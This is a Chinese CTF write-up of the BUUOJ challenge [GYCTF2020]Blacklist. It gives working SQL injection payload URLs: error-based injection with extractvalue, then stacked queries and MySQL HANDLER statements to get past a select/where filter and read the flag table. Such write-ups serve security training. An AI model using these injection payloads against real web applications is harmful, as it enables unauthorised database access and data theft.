zoukankan      html  css  js  c++  java

  • [GYCTF2020]Blacklist

    使用单引号进行闭合,发现报错

     尝试报错注入,发现过滤select,where关键字

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

     将select去掉,爆出数据库名

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(database()),0x7e)))--+

     因为过滤了select和where关键字,报错注入不能进行下去,尝试使用堆叠注入

     查询表

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show tables--+

     

     查询字段

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show columns from FlagHere--+

     查询数据,因为select无法使用,可以用handler进行代替

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;--+
  • 相关阅读:
    iOS缓存
    哈希表
    查找
    基数排序
    归并排序
    快速排序
    redis 的高并发的理解
    springboot的理解
    使用maven命令安装jar包到本地仓库
    linux Centos7 安装docker步骤
  • 原文地址:https://www.cnblogs.com/gtx690/p/13280237.html
Copyright © 2011-2022 走看看